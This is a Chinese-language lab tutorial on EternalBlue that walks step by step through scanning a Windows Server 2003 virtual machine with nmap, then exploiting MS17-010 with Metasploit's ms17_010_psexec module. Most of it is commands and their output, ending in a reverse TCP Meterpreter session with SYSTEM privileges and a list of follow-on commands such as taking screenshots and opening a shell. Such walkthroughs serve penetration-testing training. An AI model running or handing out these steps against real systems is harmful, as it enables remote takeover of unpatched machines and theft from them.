简介
永恒之蓝(Eternal Blue)爆发于2017年4月14日晚,是一种利用Windows系统的SMB协议漏洞来获取系统的最高权限,以此来控制被入侵的计算机。甚至于2017年5月12日, 不法分子通过改造“永恒之蓝”制作了wannacry勒索病毒,使全世界大范围内遭受了该勒索病毒,甚至波及到学校、大型企业、政府等机构,只能通过支付高额的赎金才能恢复出文件。不过在该病毒出来不久就被微软通过打补丁修复。
实验环境
攻击机:kali linux 192.168.1.106
目标机:win2003 192.168.1.103
利用攻击
首先我们可以利用nmap来扫描一下可能存在的漏洞
msf5 > nmap --script=vuln 192.168.1.103
[*] exec: nmap --script=vuln 192.168.1.103
Starting Nmap 7.70 ( https://nmap.org ) at 2020-08-29 13:52 CST
Nmap scan report for 192.168.1.103
Host is up (0.00051s latency).
Not shown: 996 closed ports
PORT STATE SERVICE
135/tcp open msrpc
139/tcp open netbios-ssn
445/tcp open microsoft-ds
1025/tcp open NFS-or-IIS
MAC Address: 00:0C:29:FE:8D:2D (VMware)
Host script results:
| smb-vuln-ms08-067:
| VULNERABLE:
| Microsoft Windows system vulnerable to remote code execution (MS08-067)
| State: VULNERABLE
| IDs: CVE:CVE-2008-4250
| The Server service in Microsoft Windows 2000 SP4, XP SP2 and SP3, Server 2003 SP1 and SP2,
| Vista Gold and SP1, Server 2008, and 7 Pre-Beta allows remote attackers to execute arbitrary
| code via a crafted RPC request that triggers the overflow during path canonicalization.
|
| Disclosure date: 2008-10-23
| References:
| https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2008-4250
|_ https://technet.microsoft.com/en-us/library/security/ms08-067.aspx
|_smb-vuln-ms10-054: false
|_smb-vuln-ms10-061: NT_STATUS_OBJECT_NAME_NOT_FOUND
| smb-vuln-ms17-010:
| VULNERABLE:
| Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
| State: VULNERABLE
| IDs: CVE:CVE-2017-0143
| Risk factor: HIGH
| A critical remote code execution vulnerability exists in Microsoft SMBv1
| servers (ms17-010).
|
| Disclosure date: 2017-03-14
| References:
| https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
| https://technet.microsoft.com/en-us/library/security/ms17-010.aspx
|_ https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
Nmap done: 1 IP address (1 host up) scanned in 23.40 seconds
可以看到存在ms17_010,那么我们可以进一步的验证是否存在。
搜索:ms17-010
msf5 > search ms17-010
Matching Modules
================
# Name Disclosure Date Rank Check Description
- ---- --------------- ---- ----- -----------
1 auxiliary/admin/smb/ms17_010_command 2017-03-14 normal Yes MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Command Execution
2 auxiliary/scanner/smb/smb_ms17_010 normal Yes MS17-010 SMB RCE Detection
3 exploit/windows/smb/ms17_010_eternalblue 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption
4 exploit/windows/smb/ms17_010_eternalblue_win8 2017-03-14 average No MS17-010 EternalBlue SMB Remote Windows Kernel Pool Corruption for Win8+
5 exploit/windows/smb/ms17_010_psexec 2017-03-14 normal No MS17-010 EternalRomance/EternalSynergy/EternalChampion SMB Remote Windows Code Execution
选择漏洞辅助模块进行探测
msf5 > use auxiliary/scanner/smb/smb_ms17_010
msf5 auxiliary(scanner/smb/smb_ms17_010) > options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
yes的参数要全部填上,可以看到只有RHOSTS(扫描的地址)没有,设置扫描地址的方法如下:
msf5 auxiliary(scanner/smb/smb_ms17_010) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf5 auxiliary(scanner/smb/smb_ms17_010) > options
Module options (auxiliary/scanner/smb/smb_ms17_010):
Name Current Setting Required Description
---- --------------- -------- -----------
CHECK_ARCH true no Check for architecture on vulnerable hosts
CHECK_DOPU true no Check for DOUBLEPULSAR on vulnerable hosts
CHECK_PIPE false no Check for named pipe on vulnerable hosts
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 192.168.1.103 yes The target address range or CIDR identifier
RPORT 445 yes The SMB service port (TCP)
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
THREADS 1 yes The number of concurrent threads
run/exploit:启动一下
msf5 auxiliary(scanner/smb/smb_ms17_010) > exploit
[+] 192.168.1.103:445 - Host is likely VULNERABLE to MS17-010! - Windows Server 2003 3790 Service Pack 2 x86 (32-bit)
[*] 192.168.1.103:445 - Scanned 1 of 1 hosts (100% complete)
[*] Auxiliary module execution completed
存在ms17_010漏洞,那么我们设置攻击脚本
msf5 auxiliary(scanner/smb/smb_ms17_010) > use exploit/windows/smb/ms17_010_psexec
msf5 exploit(windows/smb/ms17_010_psexec) > options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS yes The target address range or CIDR identifier
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Exploit target:
Id Name
-- ----
0 Automatic
步骤同上,还是要设置一下要攻击的地址
msf5 exploit(windows/smb/ms17_010_psexec) > set RHOSTS 192.168.1.103
RHOSTS => 192.168.1.103
msf5 exploit(windows/smb/ms17_010_psexec) > options
Module options (exploit/windows/smb/ms17_010_psexec):
Name Current Setting Required Description
---- --------------- -------- -----------
DBGTRACE false yes Show extra debug trace info
LEAKATTEMPTS 99 yes How many times to try to leak transaction
NAMEDPIPE no A named pipe that can be connected to (leave blank for auto)
NAMED_PIPES /usr/share/metasploit-framework/data/wordlists/named_pipes.txt yes List of named pipes to check
RHOSTS 192.168.1.103 yes The target address range or CIDR identifier
RPORT 445 yes The Target port
SERVICE_DESCRIPTION no Service description to to be used on target for pretty listing
SERVICE_DISPLAY_NAME no The service display name
SERVICE_NAME no The service name
SHARE ADMIN$ yes The share to connect to, can be an admin share (ADMIN$,C$,...) or a normal read/write folder share
SMBDomain . no The Windows domain to use for authentication
SMBPass no The password for the specified username
SMBUser no The username to authenticate as
Exploit target:
Id Name
-- ----
0 Automatic
设置完毕就可以启动
msf5 exploit(windows/smb/ms17_010_psexec) > run
[*] Started reverse TCP handler on 192.168.1.100:4444
[*] 192.168.1.103:445 - Target OS: Windows Server 2003 3790 Service Pack 2
[*] 192.168.1.103:445 - Filling barrel with fish... done
[*] 192.168.1.103:445 - <---------------- | Entering Danger Zone | ---------------->
[*] 192.168.1.103:445 - [*] Preparing dynamite...
[*] 192.168.1.103:445 - Trying stick 1 (x64)...Miss
[*] 192.168.1.103:445 - [*] Trying stick 2 (x86)...Boom!
[*] 192.168.1.103:445 - [+] Successfully Leaked Transaction!
[*] 192.168.1.103:445 - [+] Successfully caught Fish-in-a-barrel
[*] 192.168.1.103:445 - <---------------- | Leaving Danger Zone | ---------------->
[*] 192.168.1.103:445 - Reading from CONNECTION struct at: 0x90670b08
[*] 192.168.1.103:445 - Built a write-what-where primitive...
[+] 192.168.1.103:445 - Overwrite complete... SYSTEM session obtained!
[*] 192.168.1.103:445 - Selecting native target
[*] 192.168.1.103:445 - Uploading payload... eqCoYHQN.exe
[*] 192.168.1.103:445 - Created \eqCoYHQN.exe...
[+] 192.168.1.103:445 - Service started successfully...
[*] 192.168.1.103:445 - Deleting \eqCoYHQN.exe...
[-] 192.168.1.103:445 - Delete of \eqCoYHQN.exe failed: The server responded with error: STATUS_CANNOT_DELETE (Command=6 WordCount=0)
[*] Sending stage (179779 bytes) to 192.168.1.103
[*] Meterpreter session 1 opened (192.168.1.100:4444 -> 192.168.1.103:1029) at 2020-08-29 14:16:13 +0800
可以看到已经建立了连接,接下来我们可以:
显示远程主机系统信息:sysinfo
查看用户身份:getuid
对远程主机当前屏幕进行截图:screenshot
获得shell控制台:shell
......等